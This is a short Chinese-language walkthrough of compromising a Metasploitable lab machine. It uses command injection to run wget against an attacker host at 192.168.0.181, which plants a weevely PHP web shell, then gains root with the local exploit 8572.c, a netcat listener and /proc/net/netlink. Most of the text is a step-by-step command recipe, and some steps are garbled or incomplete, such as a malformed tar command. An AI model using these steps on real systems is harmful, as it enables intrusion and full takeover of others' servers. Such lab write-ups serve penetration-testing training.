获取Metaspolitable控制权

1.利用命令执行漏洞获取Metaspolitable的root权限

2.流程：

1.利用weevely工具生成客户端后门weevely.php，然后打包weevely.tar，命令：



 weevely generate 【密码】 weevely.php 生成后门文件，然后用tar -cvf weevely.php打包成weevely.tar;

2.利用命令;wget http://192.168.0.181/weevely.tar上传到网站目录下：再使用tar -xvf weevely.tar解压；



3.Kali中用weevely连接：



4.提权：在kali中查询searchsploit privilege ubuntu 8.04，找到8572.c，利用这个来提权，在weevely后门界面
 切换路径到/tmp，将文件用file_upload上传到/tmp中，对其先编译gcc -o exploit 8572.c，chmod 777 exploit；
 输出exploit；在kali中先侦听一个端口nc -l -p 11111；然后在kali创建run文件，上传到/tmp中，查看/proc/net/netlink，查看到最特别的四位数字，然后./exploit XXXX，即可拿到root：